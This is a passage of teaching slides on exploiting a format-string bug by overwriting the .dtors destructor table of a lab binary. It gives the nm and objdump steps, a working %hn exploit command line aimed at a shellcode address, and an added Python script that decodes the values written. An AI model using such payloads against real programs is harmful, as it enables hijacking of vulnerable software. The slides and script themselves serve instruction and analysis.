Computing .dtors Location
• Address location for our jump to shellcode should be 4 bytes past the DTOR_LIST
• Target address using example above is 0x080495bc
$ nm ./fmtstr | grep DTOR
080495bc d __DTOR_END__
080495b8 d __DTOR_LIST__
$ objdump -s -j .dtors ./fmtstr
./fmtstr:     file format elf32-i386
Contents of section .dtors:
 80495b8 ffffffff 00000000                    ........
$ ./fmtstr `printf "\xbe\x95\x04\x08\xbc\x95\x04\x08"`%.49143x%4\$hn%.16086x%5\$hn
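To check what the argument on the command line above writes, this added example (not part of the original slides) decodes its %hn directives in Python and reports the value left in the slot 4 bytes past __DTOR_LIST__. It assumes printf arguments 4 and 5 are the two addresses at the start of the string; the function names are illustrative.

```python
import re
import struct

# Address from the nm output above.
DTOR_LIST = 0x080495B8
# Constructed from the command line above: the bytes printf emits, then the
# format directives as the program receives them (shell escapes removed).
ARG = b"\xbe\x95\x04\x08\xbc\x95\x04\x08%.49143x%4$hn%.16086x%5$hn"
SPEC = re.compile(rb"%(?:(\d+)\$)?(?:\.(\d+))?(hn|x)")

def decode_hn_writes(arg, first_arg_index=4):
    """Return [(address, 16-bit value)] for each %N$hn directive in arg.

    Assumption: printf argument first_arg_index is the first 4 bytes of arg.
    """
    writes, printed, pos = [], 0, 0
    for m in SPEC.finditer(arg):
        printed += m.start() - pos  # literal bytes are printed one for one
        pos = m.end()
        argno, precision, conv = m.groups()
        if conv == b"x":
            # %.Nx prints exactly N digits once N >= 8 (32-bit value).
            if precision is None or int(precision) < 8:
                raise ValueError("output length depends on the stack value")
            printed += int(precision)
        else:
            if argno is None:
                raise ValueError("%hn without an argument number")
            offset = (int(argno) - first_arg_index) * 4
            if not 0 <= offset <= len(arg) - 4:
                raise ValueError("argument is outside the string")
            (addr,) = struct.unpack_from("<I", arg, offset)
            writes.append((addr, printed & 0xFFFF))
    return writes

def merged_words(writes):
    """Combine 2-byte-aligned %hn writes into the 32-bit words they change."""
    words = {}
    for addr, value in writes:
        base, shift = addr & ~3, (addr & 3) * 8
        words[base] = (words.get(base, 0) & ~(0xFFFF << shift)) | (value << shift)
    return words

def dtors_slot_value(arg):
    """Value left in the slot 4 bytes past __DTOR_LIST__, or None if untouched."""
    return merged_words(decode_hn_writes(arg)).get(DTOR_LIST + 4)

if __name__ == "__main__":
    for addr, value in decode_hn_writes(ARG):
        print(f"%hn writes {value:#06x} to {addr:#010x}")
    print(f"slot {DTOR_LIST + 4:#010x} <- {dtors_slot_value(ARG):#010x}")
```

The running character count is 8 + 49143 = 49151 at the first %hn and 49151 + 16086 = 65237 at the second, which is why the two half-words differ.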